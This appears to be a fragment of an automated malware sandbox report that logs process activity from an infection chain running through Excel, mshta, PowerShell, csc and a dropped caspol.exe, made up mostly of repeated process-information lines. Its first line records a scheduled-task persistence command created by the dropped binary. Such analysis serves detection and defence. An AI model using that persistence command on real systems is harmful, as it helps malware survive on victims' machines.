                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp"
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
